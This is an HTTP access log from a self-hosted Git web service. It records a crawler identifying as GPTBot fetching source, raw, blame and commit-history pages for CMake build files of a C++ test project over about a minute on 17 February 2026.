"/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10223] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10767] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11283] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16048] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12011] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11280] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16399] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10070] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" 